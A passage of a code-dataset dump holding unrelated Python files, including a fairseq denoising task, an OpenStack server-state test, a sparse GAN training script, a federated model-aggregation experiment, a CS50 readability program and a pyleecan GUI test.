os.listdir(data_path)\r\n if os.path.isdir(os.path.join(data_path, name))\r\n ]\r\n )\r\n else:\r\n languages = self.langs.split(\",\")\r\n for name in languages:\r\n p = os.path.join(data_path, name)\r\n assert os.path.exists(p), \"data not found: {}\".format(p)\r\n\r\n logger.info(\"Training on {0} languages: {1}\".format(len(languages), languages))\r\n logger.info(\r\n \"Language to id mapping: \", {lang: id for id, lang in enumerate(languages)}\r\n )\r\n\r\n mask_whole_words = get_whole_word_mask(self.args, self.dictionary)\r\n language_without_segmentations = self.args.no_whole_word_mask_langs.split(\",\")\r\n lang_datasets = []\r\n for language in languages:\r\n split_path = os.path.join(data_path, language, split)\r\n\r\n dataset = data_utils.load_indexed_dataset(\r\n split_path,\r\n self.source_dictionary,\r\n self.args.dataset_impl,\r\n combine=combine,\r\n )\r\n if dataset is None:\r\n raise FileNotFoundError(\r\n \"Dataset not found: {} ({})\".format(split, split_path)\r\n )\r\n\r\n end_token = (\r\n self.source_dictionary.index(\"[{}]\".format(language))\r\n if self.args.add_lang_token\r\n else self.source_dictionary.eos()\r\n )\r\n\r\n # create continuous blocks of tokens\r\n dataset = TokenBlockDataset(\r\n dataset,\r\n dataset.sizes,\r\n self.args.tokens_per_sample - 2, # one less for \r\n pad=self.source_dictionary.pad(),\r\n eos=end_token,\r\n break_mode=self.args.sample_break_mode,\r\n )\r\n logger.info(\"loaded {} blocks from: {}\".format(len(dataset), split_path))\r\n\r\n # prepend beginning-of-sentence token (, equiv. to [CLS] in BERT)\r\n dataset = PrependTokenDataset(dataset, self.source_dictionary.bos())\r\n dataset = AppendTokenDataset(dataset, end_token)\r\n\r\n lang_mask_whole_words = (\r\n mask_whole_words\r\n if language not in language_without_segmentations\r\n else None\r\n )\r\n lang_dataset = DenoisingDataset(\r\n dataset,\r\n dataset.sizes,\r\n self.dictionary,\r\n self.mask_idx,\r\n lang_mask_whole_words,\r\n shuffle=self.args.shuffle_instance,\r\n seed=self.seed,\r\n args=self.args,\r\n eos=None\r\n if not self.args.add_lang_token\r\n else self.source_dictionary.index(\"[{}]\".format(language)),\r\n )\r\n lang_datasets.append(lang_dataset)\r\n\r\n dataset_lengths = np.array(\r\n [len(d) for d in lang_datasets],\r\n dtype=float,\r\n )\r\n logger.info(\r\n \"loaded total {} blocks for all languages\".format(\r\n int(dataset_lengths.sum()),\r\n )\r\n )\r\n if split == self.args.train_subset:\r\n # For train subset, additionally up or down sample languages.\r\n sample_probs = self._get_sample_prob(dataset_lengths)\r\n logger.info(\r\n \"Sample probability by language: {}\".format(\r\n {\r\n lang: \"{0:.4f}\".format(sample_probs[id])\r\n for id, lang in enumerate(languages)\r\n }\r\n )\r\n )\r\n size_ratio = (sample_probs * dataset_lengths.sum()) / dataset_lengths\r\n logger.info(\r\n \"Up/Down Sampling ratio by language: {}\".format(\r\n {\r\n lang: \"{0:.2f}\".format(size_ratio[id])\r\n for id, lang in enumerate(languages)\r\n }\r\n )\r\n )\r\n\r\n resampled_lang_datasets = [\r\n ResamplingDataset(\r\n lang_datasets[i],\r\n size_ratio=size_ratio[i],\r\n seed=self.args.seed,\r\n epoch=epoch,\r\n replace=size_ratio[i] >= 1.0,\r\n )\r\n for i, d in enumerate(lang_datasets)\r\n ]\r\n dataset = ConcatDataset(\r\n resampled_lang_datasets,\r\n )\r\n else:\r\n dataset = ConcatDataset(lang_datasets)\r\n lang_splits = [split]\r\n for lang_id, lang_dataset in enumerate(lang_datasets):\r\n split_name = split + \"_\" + languages[lang_id]\r\n lang_splits.append(split_name)\r\n self.datasets[split_name] = lang_dataset\r\n\r\n if split in self.args.valid_subset:\r\n self.args.valid_subset = self.args.valid_subset.replace(\r\n split, \",\".join(lang_splits)\r\n )\r\n\r\n with data_utils.numpy_seed(self.args.seed + epoch):\r\n shuffle = np.random.permutation(len(dataset))\r\n\r\n self.datasets[split] = SortDataset(\r\n dataset,\r\n sort_order=[\r\n shuffle,\r\n dataset.sizes,\r\n ],\r\n )\r\n","sub_path":"edgelm/fairseq/tasks/multilingual_denoising.py","file_name":"multilingual_denoising.py","file_ext":"py","file_size_in_byte":9012,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"27370520","text":"import sentiment_analysis\r\nimport re\r\n\r\n\r\ndef file_extension(tweet_file, keyword_file): # checks whether a file extension is given using regular expressions\r\n file_ext = re.compile(r\".txt\") # This is the variable which will search for the .txt extension\r\n\r\n tweet_extension = file_ext.findall(tweet_file) # Searches for the .txt extension on this file\r\n keyword_extension = file_ext.findall(keyword_file) # Searches for the .txt extension\r\n\r\n if len(tweet_extension) == 0 and len(keyword_extension) == 0: # If their is no extension on either file\r\n return tweet_file + \".txt\", keyword_file + \".txt\" # Return the files with the extensions\r\n elif len(tweet_extension) >= 1 and len(keyword_extension) == 0: # If their is no extension on the keyword file\r\n return tweet_file, keyword_file + \".txt\" # Returns the keyword file with an extension and the tweet the same\r\n elif len(tweet_extension) == 0 and len(keyword_extension) >= 1: # If their is no extension on the tweet file\r\n return tweet_file + \".txt\", keyword_file # Returns the tweet file with an extension and the keyword the same\r\n elif len(tweet_extension) >= 1 and len(keyword_extension) >= 1: # If there are extensions on both files\r\n return tweet_file, keyword_file # Returns both files the same\r\n\r\n\r\ndef main():\r\n tweet_file_name = str(input(\"Please submit the file with the tweets: \")) # Get's the file with the tweets\r\n keyword_file_name = str(input(\"Please submit the file with the keywords: \")) # Get's the file with the keywords\r\n\r\n files = file_extension(tweet_file_name, keyword_file_name) # Checks the extensions on the file names\r\n\r\n sentiments = sentiment_analysis.compute_tweets(files[0], files[1])\r\n print(\"Eastern tweet results: Average: \" + str(sentiments[0][0]) + \", number of keyword tweets: \" +\r\n str(sentiments[0][1]) + \", number of tweets in region: \" + str(sentiments[0][2])) # Prints the value compute tweets returns\r\n\r\n print(\"Central tweet results: Average: \" + str(sentiments[1][0]) + \", number of keyword tweets: \" +\r\n str(sentiments[1][1]) + \", number of tweets in region: \" + str(\r\n sentiments[1][2])) # Prints the value compute tweets returns\r\n\r\n print(\"Mountain tweet results: Average: \" + str(sentiments[2][0]) + \", number of keyword tweets: \" +\r\n str(sentiments[2][1]) + \", number of tweets in region: \" + str(\r\n sentiments[2][2])) # Prints the value compute tweets returns\r\n\r\n print(\"Pacific tweet results: Average: \" + str(sentiments[3][0]) + \", number of keyword tweets: \" +\r\n str(sentiments[3][1]) + \", number of tweets in region: \" + str(\r\n sentiments[3][2])) # Prints the value compute tweets returns\r\n\r\n\r\nmain()\r\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2759,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"282814357","text":"from tempest import openstack\nimport unittest2 as unittest\nfrom nose.plugins.attrib import attr\nimport os\nimport subprocess\nfrom paramiko import SSHClient\nfrom paramiko import AutoAddPolicy\nimport tempest.config\nfrom tempest.common.utils.data_utils import rand_name\nfrom tempest import exceptions\nimport re\n\n\nclass VMstateTest(unittest.TestCase):\n @classmethod\n def setUpClass(cls):\n cls.os = openstack.Manager()\n cls.client = cls.os.servers_client\n cls.config = cls.os.config\n cls.image_ref = cls.config.compute.image_ref\n cls.flavor_ref = cls.config.compute.flavor_ref \n cls.login_name = cls.config.compute.login_name\n cls.pswd = cls.config.compute.pswd\n \n def setUp(self):\n self.name = rand_name('server')\n resp, server = self.client.create_server(self.name,\n self.image_ref,\n self.flavor_ref)\n self.server_id = server['id'] \n self.client.wait_for_server_status(self.server_id, 'ACTIVE')\n \n def tearDown(self):\n self.client.delete_server(self.server_id)\n \n @attr(type='positive')\n def test_suspend_resume_server(self): \n \"\"\"The server should have ACTIVE status after the suspend-resume procedure\"\"\" \n self.client.suspend(self.server_id)\n self.client.wait_for_server_status(self.server_id, 'SUSPENDED')\n self.client.resume(self.server_id)\n self.client.wait_for_server_status(self.server_id, 'ACTIVE')\n resp, body=self.client.get_server(self.server_id) \n self.assertEqual(\"ACTIVE\",body['status'])\n \n @attr(type='positive') \n def test_ping_server(self):\n \"\"\"The sever should ping the Internet and other servers from the same subnet\"\"\" \n resp, body=self.client.get_server(self.server_id) \n # Find IP of server\n try:\n (_, network) = body['addresses'].popitem()\n ip = network[0]['addr']\n except KeyError:\n self.fail(\"Failed to retrieve IP address from server entity\")\n \n params = {'status': 'active'}\n data,sbody=self.client.list_servers_with_detail(params) \n servers=[] \n \n # Get the list of active servers from the same subnet\n for i in sbody['servers']: \n (_, network) = i['addresses'].popitem()\n iip = network[0]['addr']\n servers.append(iip) \n \n # regexp\n exp=re.compile(r\"0% packet loss\") \n \n #ssh into server \n ssh=SSHClient()\n ssh.set_missing_host_key_policy(AutoAddPolicy())\n ssh.connect(ip,username=self.login_name,password=self.pswd)\n # Try to ping the internet\n stdin, stdout, stderr=ssh.exec_command(\"ping -c2 8.8.8.8\")\n # Read the output\n bufferdata = stdout.read() \n # Check if internet is available\n if exp.search(bufferdata):\n isping=\"0% packet loss\"\n self.assertEqual(\"0% packet loss\", isping)\n ping = \"\" \n for j in servers: \n stdin, stdout, stderr=ssh.exec_command(\"ping -c2 \"+j) \n buffer = stdout.read()\n if exp.search(buffer):\n ping=\"0% packet loss\"\n self.assertEqual(\"0% packet loss\", ping, \"The severs with ip \"+j+\" is unavailable\")\n \n \n \n \n\n\n\n \n \n \n \n \n \n \n \n ","sub_path":"tempest/tests/compute/test_server_state.py","file_name":"test_server_state.py","file_ext":"py","file_size_in_byte":3588,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"362942789","text":"class Node:\n\tdef __init__(self):\n\t\tself.data=None\n\t\tself.pointer=None \n\nclass queue:\n\tdef __init__(self):\n\t\tself.n=0\n\t\tself.head=None\n\t\tself.tail=None\n\n\tdef enqueue(self,x):\n\t\ttemp=Node()\n\t\ttemp.data=x\n\t\tif self.n==0:\n\t\t\tself.head=temp\n\t\t\tself.tail=temp\n\t\t\tself.n+=1\n\t\telse:\n\t\t\tself.tail.pointer=temp\n\t\t\tself.tail=temp\n\t\t\tself.n+=1\n\n\tdef dequeue(self):\n\t\tif self.n==0:\n\t\t\traise ValueError(\"Queue is empty\")\n\t\t\treturn\n\t\t\n\t\telement=self.head.data\n\t\tself.head=self.head.pointer\n\t\tself.n=self.n-1\n\t\treturn element\n\n\n\tdef isempty(self):\n\t\tif self.n==0:\n\t\t\treturn 1\n\t\telse :\n\t\t\treturn 0\t\n\n\tdef qprint(self):\n\t\ttrav=self.head\n\t\twhile trav!=None:\n\t\t\treturn(trav.data)\n\t\t\ttrav=trav.pointer\n\n\tdef mnode(self,m):\n\t\tc=0\n\t\ttrav=self.head\n\t\tif m {np.sum(np.multiply(self.outs, ideal)) / size}\")\n\n def weights_correction(self, data_size, training_rate):\n self.weights -= self.corrections / data_size * training_rate\n\n\nDATA = [\n ([0, 0], [0, ]),\n ([0, 1], [1, ]),\n ([1, 0], [1, ]),\n ([1, 1], [0, ])\n ]\n\nweb = Web([2, 3, 2], 0.75)\n\n","sub_path":"neural_network_v3.py","file_name":"neural_network_v3.py","file_ext":"py","file_size_in_byte":3637,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"279700236","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu May 24 15:29:57 2018\n\n@author: Luc Deike\n\"\"\"\n\nimport pims\nimport matplotlib.pyplot as plt\nimport comps\n\nfolder = comps.cf('comp3c')+'180522\\\\'\nc = pims.open(folder+'nozzle_zoomIn_ingestedBubbles.cine')\n\ndx = 1.6438267326E-05\n\nf = 117\n\nfig = plt.figure(figsize=(14,7))\nax = fig.add_subplot(111)\nax.imshow(c[f],vmin=0,vmax=500,cmap='gray')\nax.set_axis_off()\n\n'''\nscale bar\n'''\n\nax.plot([1500,1500+0.01/dx],[1500,1500],'-',color='r',lw=3)\nax.text(1800,1600,'1 cm',color='r',fontsize=16)\n\nfig.tight_layout()\nfig.savefig(folder+'bubble_ingestion_example.pdf')","sub_path":"scripts/OLD/bubble_pump_ingestion_figure.py","file_name":"bubble_pump_ingestion_figure.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"613625282","text":"import tensorflow as tf\nimport numpy\nimport sparse_conv_gen as sparse\nimport datasets\n\nimport network as net\n\nd_0 = 100\n\nlearning_rate = 2.0\n\nFROM_SAVE = False\n\nnormalize_G = False\nnormalize_D = False\n\nepochs = 10000\n\nn = 4\nm = 3\n\nbatch_size = 16\n\niterator = datasets.celeb_A().batch(batch_size).make_one_shot_iterator()\nZ, z_batch = datasets.random_normal(d_0)\nX = iterator.get_next()\n\ndef batch(batch_size):\n return {**x_batch(batch_size), **z_batch(batch_size)}\n\n\n\nnon_lin_G = net.shift_relu\nnon_lin_D = tf.nn.relu\n\n################# GENERATOR ##########3333\n'''\nxs = tf.lin_space(-1.5, 1.5, 28)\nxs = tf.stack([tf.tile(tf.reshape(xs, [-1, 1]), [1, 28]),\n tf.tile(tf.reshape(xs, [1, -1]), [28, 1])], 2)\nxs = tf.reshape(xs, [-1, 2])\n'''\n[Z1], theta = net.affine([Z], d_0, 500*n)\nZ1 = non_lin_G(Z1)\nif normalize_G:\n [Z1] = net.normalize([Z1])\n\n[V0], theta1 = net.affine([Z1], 500*n, 500*n)\nV0 = non_lin_G(V0)\nif normalize_G:\n [V0] = net.normalize([V0])\n\n[P0], theta2 = net.affine([Z1], 500*n, 2)\n[R0], theta3 = net.affine([Z1], 500*n, 2)\nR0 = tf.reshape(R0, [-1, 1, 2]) + [0.8, 0]\nR0 = 0.8 * R0 / (0.3 + tf.norm(R0, axis=-1, keepdims=True))\n\nscene0 = {\n \"vs\": tf.reshape(V0, [-1, 1, 500*n]),\n \"ps\": tf.reshape(P0, [-1, 1, 2])*0.3,\n \"rs\": R0\n }\n\n\ndef mod_scene(sc):\n sc['rs'] = sc['rs']*2.0\n return sc\n\n\nX0_gen, generator = sparse.sparse_net(scene0, 64, 3.0 / 64.0,\n [500*n, 400*n, 300*n, 200*n, 100*n, 50*n, 20*n], [2, 2, 2, 2, 3, 3],\n normalize_G, non_lin=non_lin_G,\n mod_scene=mod_scene)\n\nX0_gen = non_lin_G(X0_gen)\n\n#[X_gen], theta4 = net.affine([tf.reshape(X0_gen, [batch_size*64*64, -1])], 20*n, 3)\n#X_gen = tf.reshape(X_gen, [-1, 64, 64, 3])\n\n[W_last], theta_W = net.affine([Z1], 500*n, 20*n*3)\n[b_last], theta_b = net.affine([Z1], 500*n, 3)\nX_gen = tf.matmul(tf.reshape(X0_gen, [batch_size, 64*64, -1]), tf.reshape(W_last, [batch_size, -1, 3])) / tf.sqrt(20.0*n)\nX_gen = X_gen + 0.5 + 0.1 * tf.reshape(b_last, [batch_size, 1, 3])\nX_gen = tf.reshape(X_gen, [-1, 64, 64, 3])\n\nX_gen = tf.atan(tf.nn.relu(X_gen)) * 2 / numpy.pi\ntf.summary.image('generated', X_gen, max_outputs=16)\n\ngenerator = generator + theta + theta1 + theta2 + theta3 + theta_W + theta_b\n\n##################### DISCRIMINATOR #######\n\n[X1, X1_gen], vs0 = net.conv_net([X*1.5 - 0.5, X_gen * 1.5 - 0.5], [3, 104*m, 228*m, 428*m, 428*m, 400*m],\n [4, 4, 4, 3, 1], [2, 2, 2, 2, 1],\n \"D_conv\", normalize_D, non_lin_D)\n \nX1 = non_lin_D(X1)\nX1_gen = non_lin_D(X1_gen)\nif normalize_D:\n X1, X1_gen = net.normalize([X1, X1_gen], [0, 1, 2])\nX1 = tf.reshape(X1, [-1, 4*4*400*m])\nX1_gen = tf.reshape(X1_gen, [-1, 4*4*400*m])\n\n[D_real, D_gen], vs1 = net.affine([X1, X1_gen], 4*4*400*m, 1, \"D\")\n \ntf.summary.histogram(\"D_real\", D_real)\ntf.summary.histogram(\"D_gen\", D_gen)\n\n\ndiscriminator = vs0 + vs1\n\n######################### COSTS #############\n'''\nD_cost = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(None, tf.ones_like(D_real), D_real)) + \\\n tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(None, tf.zeros_like(D_gen), D_gen))\nG_cost = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(None, tf.ones_like(D_gen), D_gen))\n\n'''\nD_cost = tf.reduce_mean(D_real) - tf.reduce_mean(D_gen)\nG_cost = tf.reduce_mean(D_gen)\n\nD_cost += 0.5 * tf.reduce_mean(tf.square(D_real)) + 0.5 * tf.reduce_mean(tf.square(D_gen))\nG_cost += 0.5 * tf.reduce_mean(tf.square(D_real)) + 0.5 * tf.reduce_mean(tf.square(D_gen))\n\n\ntf.summary.scalar(\"D_cost\", D_cost)\ntf.summary.scalar(\"G_cost\", G_cost)\n\ntf.summary.tensor_summary(\"D_gen\", D_gen)\ntf.summary.tensor_summary(\"D_real\", D_real)\n\n\n\nopt = tf.train.GradientDescentOptimizer(learning_rate)\n\ninfo = []\nstep = []\n\ngrad_G = tf.gradients(G_cost, generator)\ngrad_D = tf.gradients(D_cost, discriminator)\n\ngrads = grad_D + grad_G\n\nstep = step + [opt.apply_gradients(zip(grads, discriminator + generator))]\nfix = net.fix_weights(generator) + net.fix_weights(discriminator)\n'''\nwith tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n x_gen = sess.run(X_gen, feed_dict=batch(2))\n\nimport matplotlib.pyplot as P\n\nP.imshow(x_gen[0, :, :, 0]);P.show()\n\n'''\nsave_dir = \"CELEB_GAN\"\n\nif FROM_SAVE==False:\n import os\n for file in os.listdir(save_dir):\n os.remove(os.path.join(save_dir, file))\n\n\nmerged = tf.summary.merge_all()\ntrain_writer = tf.summary.FileWriter(save_dir, flush_secs=5)\n\nsaver = tf.train.Saver()\n\nsess = tf.Session()\n\nif FROM_SAVE:\n saver.restore(sess, save_dir + \"/model.ckpt\")\nelse:\n sess.run(tf.global_variables_initializer())\n\n\ntry:\n const_dict = z_batch(batch_size)\n \n for t in range(epochs):\n for _ in range(1):\n _, cost = sess.run([step, D_cost], feed_dict=z_batch(batch_size))\n #sess.run(fix)\n print(cost)\n\n if t % 5 == 0:\n print(\"SAVE IMAGE\")\n summary, x_gen, d_gen, d_real = sess.run([merged, X_gen, D_real, D_gen], feed_dict=const_dict)\n \n train_writer.add_summary(summary, t)\n train_writer.flush()\n \n\nfinally:\n print(\"closing\")\n saver.save(sess, save_dir + '/model.ckpt')\n sess.close()\n train_writer.close()\n\n# tensorboard --logdir=CELEB_GAN --reload_interval=4\n\n\n","sub_path":"sparse_GAN_celeb.py","file_name":"sparse_GAN_celeb.py","file_ext":"py","file_size_in_byte":5355,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"403719668","text":"#!/usr/bin/env python3\n# -*- coding:utf-8 -*-\n\n \ndef fab(num):\n '''\n 斐波那契额数列,兔子问题\n '''\n list = []\n a,b = 1,0\n for i in range(num):\n b,a = a,a+b\n list.append(b)\n \n print(list)\n\nif __name__ == \"__main__\":\n fab(8)","sub_path":"Python_basic/4.fab.py","file_name":"4.fab.py","file_ext":"py","file_size_in_byte":282,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"133205130","text":"from __future__ import print_function\nimport tensorflow.keras as keras\nfrom tensorflow.keras.datasets import mnist\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Dense, Dropout, Flatten\nfrom tensorflow.keras.layers import Conv2D, MaxPooling2D\nfrom tensorflow.keras import backend as K\nimport datetime\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport matplotlib.lines as mlines\nimport tensorflow as tf\nimport utils\nimport semantic_drift\n\n# Fully federated, one-to-one model from the initial model\n\n# Hyperparameters\nbatch_size = 50\nepochs = 20\n\n# input image dimensions\nimg_rows, img_cols = 28, 28\n\n\ndef custom_model(input_shape, num_classes):\n model = Sequential()\n model.add(Flatten(input_shape=input_shape))\n model.add(Dense(200, activation='relu'))\n model.add(Dense(200, activation='relu'))\n model.add(Dense(num_classes, activation='softmax'))\n return model\n\ndef compile_model(model): \n # initiate SGD optimizer\n opt = keras.optimizers.SGD(lr=0.1)\n model.compile(loss='mean_squared_error', optimizer=opt, metrics=['accuracy'])\n \ndef fit_model_with_datasets(model, epochs, x_train, y_train):\n now = datetime.datetime.now()\n# print (\"Training date and time : \")\n# print (now.strftime(\"%Y-%m-%d %H:%M:%S\"))\n res = model.fit(x_train, y_train,\n batch_size=batch_size,\n epochs=epochs,\n shuffle=True,\n verbose=0)\n# print (\"Elasped Time: \" + str(datetime.datetime.now() - now))\n return res\n\ndef model_combs(model_list):\n combs = list()\n l = len(model_list)\n for i in range(l):\n for j in range(l):\n if i > j:\n combs.append([model_list[i], model_list[j]])\n return combs\n\ndef run(seed):\n print(\"seed {}\".format(seed))\n \n log_dir = \"logs/fit/\" + datetime.datetime.now().strftime(\"%Y%m%d-%H%M%S\")\n tensorboard_callback = tf.keras.callbacks.TensorBoard(log_dir=log_dir, histogram_freq=1)\n \n np.random.seed(seed)\n \n # the data, split between train and test sets\n (x_train, y_train), (x_test, y_test) = mnist.load_data()\n\n if K.image_data_format() == 'channels_first':\n x_train = x_train.reshape(x_train.shape[0], 1, img_rows, img_cols)\n x_test = x_test.reshape(x_test.shape[0], 1, img_rows, img_cols)\n input_shape = (1, img_rows, img_cols)\n else:\n x_train = x_train.reshape(x_train.shape[0], img_rows, img_cols, 1)\n x_test = x_test.reshape(x_test.shape[0], img_rows, img_cols, 1)\n input_shape = (img_rows, img_cols, 1)\n\n x_train = x_train.astype('float32')\n x_test = x_test.astype('float32')\n x_train /= 255\n x_test /= 255\n\n global_dataset_size = 0\n local_dataset_size = 60000\n\n X_global = x_train[-global_dataset_size:]\n Y_global = y_train[-global_dataset_size:]\n X_local = x_train[:-global_dataset_size]\n Y_local = y_train[:-global_dataset_size]\n\n X_local_list, Y_local_list = utils.split_training_set(3000, 20, X_local, Y_local)\n\n # convert class vectors to binary class matrices\n num_classes = 10\n Y_global = keras.utils.to_categorical(Y_global, num_classes)\n y_test = keras.utils.to_categorical(y_test, num_classes)\n\n model1 = custom_model(input_shape, num_classes)\n compile_model(model1)\n fit_model_with_datasets(model1, 1, X_global, Y_global)\n\n model_list = list()\n for _ in range(20):\n model_list.append(tf.keras.models.clone_model(model1)) \n model_list[_].set_weights(model1.get_weights())\n\n # sort models according to similarity. We arbitrarily take the model1 as a \"standard\"\n standard_model = tf.keras.models.clone_model(model1)\n standard_model.set_weights(model_list[0].get_weights())\n\n for i in range(len(model_list)):\n compile_model(model_list[i])\n fit_model_with_datasets(model_list[i], (i+1)*10, X_local_list[i], Y_local_list[i])\n\n model_list.sort(key=lambda m : semantic_drift.l2_distance(standard_model, m))\n\n theta_list = [0, 0.5, 1]\n agg_weights_list_per_pi = list()\n dist_list = list()\n\n for model_comp in model_combs(model_list):\n if model_comp[0] is model_comp[1]: #disregard same models\n continue\n weights = [model_comp[0].get_weights(), model_comp[1].get_weights()]\n agg_weights_list = list()\n for theta in theta_list:\n agg_weights = list()\n for weights_list_tuple in zip(*weights):\n agg_weights.append(np.array([np.average(np.array(w), axis=0, weights=[1. - theta, theta]) for w in zip(*weights_list_tuple)]))\n agg_weights_list.append(agg_weights)\n dist_list.append(semantic_drift.l2_distance(model_comp[0], model_comp[1]))\n agg_weights_list_per_pi.append(agg_weights_list)\n\n agg_weights_list_per_pi_sorted = [x for _,x in sorted(zip(dist_list,agg_weights_list_per_pi))]\n model_combs_sorted = [x for _,x in sorted(zip(dist_list, model_combs(model_list)))]\n\n B = np.zeros(len(agg_weights_list_per_pi))\n\n i = 0\n for agg_weights_list in agg_weights_list_per_pi_sorted:\n\n aggr_model = keras.models.clone_model(model1)\n aggr_model.set_weights(agg_weights_list[1])\n compile_model(aggr_model)\n score = aggr_model.evaluate(x=x_test, y=y_test, verbose=0)\n \n aggr_model = keras.models.clone_model(model1)\n aggr_model.set_weights(agg_weights_list[0])\n compile_model(aggr_model)\n comp_score1 = aggr_model.evaluate(x=x_test, y=y_test, verbose=0)\n \n aggr_model = keras.models.clone_model(model1)\n aggr_model.set_weights(agg_weights_list[2])\n compile_model(aggr_model)\n comp_score2 = aggr_model.evaluate(x=x_test, y=y_test, verbose=0)\n \n B[i] = score[0] - min(comp_score1[0], comp_score2[0])\n K.clear_session() #prevent memory leak https://github.com/keras-team/keras/issues/13118\n i += 1\n if i % 10 == 0:\n print(\"{}th iteration\".format(i))\n\n return B, dist_list","sub_path":"aggregation_experiment_transferred.py","file_name":"aggregation_experiment_transferred.py","file_ext":"py","file_size_in_byte":6075,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"342341362","text":"from cs50 import get_string\nfrom sys import exit\n\nletterCount = wordCount = sentenceCount = 0\n\ninputString = get_string(\"Enter: \")\n# Characters signifying end of sentence\nendChars = \"?!.\"\n\n# Loop across the string\nfor c in inputString:\n # Check letter\n if c.isalpha():\n letterCount += 1\n # Check space\n if c == \" \":\n # For first space encountered increment wordCount\n if (not wordCount):\n wordCount += 1\n wordCount += 1\n # Check if character is a sentenace endpoint\n if c in endChars:\n sentenceCount += 1\n\n# Coleman-Liau formula\nL = 100 * letterCount / wordCount\nS = 100 * sentenceCount / wordCount\nindex = round(0.0588 * L - 0.296 * S - 15.8)\n\nif (index < 1):\n print(\"Before Grade 1\\n\")\nelif (index > 16):\n print(\"Grade 16+\\n\")\nelse:\n print(f\"Grade {index}\\n\") \n","sub_path":"week6/readability.py","file_name":"readability.py","file_ext":"py","file_size_in_byte":836,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"491009150","text":"# -*- coding: utf-8 -*-\n\"\"\"\n@date Created on Wed Jan 20 14:10:24 2016\n@copyright (C) 2015-2016 EOMYS ENGINEERING.\n@author pierre_b\n\"\"\"\n\nimport sys\nfrom random import uniform\n\nfrom PySide2 import QtWidgets\nfrom PySide2.QtTest import QTest\nfrom pyleecan.Classes.Material import Material\nfrom pyleecan.Classes.LamHole import LamHole\nfrom pyleecan.Classes.HoleM57 import HoleM57\nfrom pyleecan.GUI.Dialog.DMatLib.DMatLib import LIB_KEY, MACH_KEY\nfrom pyleecan.GUI.Dialog.DMachineSetup.SMHoleMag.PHoleM57.PHoleM57 import PHoleM57\nfrom Tests.GUI import gui_option # Set unit to m\n\nimport pytest\n\n\nclass TestPHoleM57(object):\n \"\"\"Test that the widget PHoleM57 behave like it should\"\"\"\n\n @pytest.fixture\n def setup(self):\n \"\"\"Run at the begining of every test to setup the gui\"\"\"\n\n if not QtWidgets.QApplication.instance():\n self.app = QtWidgets.QApplication(sys.argv)\n else:\n self.app = QtWidgets.QApplication.instance()\n\n test_obj = LamHole(Rint=0.1, Rext=0.2)\n test_obj.hole = list()\n test_obj.hole.append(\n HoleM57(H1=0.11, H2=0.12, W0=0.13, W1=0.14, W2=0.15, W3=0.17, W4=0.19)\n )\n test_obj.hole.append(\n HoleM57(\n H1=0.11,\n H2=0.12,\n W0=0.13,\n W1=0.14,\n W2=0.15,\n W3=0.17,\n W4=0.19,\n magnet_0=None,\n )\n )\n\n material_dict = {LIB_KEY: list(), MACH_KEY: list()}\n material_dict[LIB_KEY] = [\n Material(name=\"Magnet1\"),\n Material(name=\"Magnet2\"),\n Material(name=\"Magnet3\"),\n ]\n\n widget = PHoleM57(test_obj.hole[0], material_dict)\n widget2 = PHoleM57(test_obj.hole[1], material_dict)\n\n yield {\n \"widget\": widget,\n \"widget2\": widget2,\n \"test_obj\": test_obj,\n \"material_dict\": material_dict,\n }\n\n self.app.quit()\n\n def test_init(self, setup):\n \"\"\"Check that the Widget spinbox initialise to the lamination value\"\"\"\n\n assert setup[\"widget\"].lf_H1.value() == 0.11\n assert setup[\"widget\"].lf_H2.value() == 0.12\n assert setup[\"widget\"].lf_W0.value() == 0.13\n assert setup[\"widget\"].lf_W1.value() == 0.14\n assert setup[\"widget\"].lf_W2.value() == 0.15\n assert setup[\"widget\"].lf_W3.value() == 0.17\n assert setup[\"widget\"].lf_W4.value() == 0.19\n\n assert setup[\"widget\"].w_mat_1.isHidden() == False\n\n setup[\"test_obj\"].hole[0] = HoleM57(\n H1=0.21, H2=0.22, W0=0.23, W1=0.24, W2=0.25, W3=0.27, W4=0.29\n )\n setup[\"widget\"] = PHoleM57(setup[\"test_obj\"].hole[0], setup[\"material_dict\"])\n assert setup[\"widget\"].lf_H1.value() == 0.21\n assert setup[\"widget\"].lf_H2.value() == 0.22\n assert setup[\"widget\"].lf_W0.value() == 0.23\n assert setup[\"widget\"].lf_W1.value() == 0.24\n assert setup[\"widget\"].lf_W2.value() == 0.25\n assert setup[\"widget\"].lf_W3.value() == 0.27\n assert setup[\"widget\"].lf_W4.value() == 0.29\n\n assert setup[\"widget2\"].w_mat_1.isHidden() == True\n\n def test_set_W0(self, setup):\n \"\"\"Check that the Widget allow to update W0\"\"\"\n # Clear the field before writing the new value\n setup[\"widget\"].lf_W0.clear()\n QTest.keyClicks(setup[\"widget\"].lf_W0, \"0.31\")\n setup[\"widget\"].lf_W0.editingFinished.emit() # To trigger the slot\n\n assert setup[\"widget\"].hole.W0 == 0.31\n assert setup[\"test_obj\"].hole[0].W0 == 0.31\n\n def test_set_W1(self, setup):\n \"\"\"Check that the Widget allow to update W1\"\"\"\n setup[\"widget\"].lf_W1.clear()\n QTest.keyClicks(setup[\"widget\"].lf_W1, \"0.32\")\n setup[\"widget\"].lf_W1.editingFinished.emit() # To trigger the slot\n\n assert 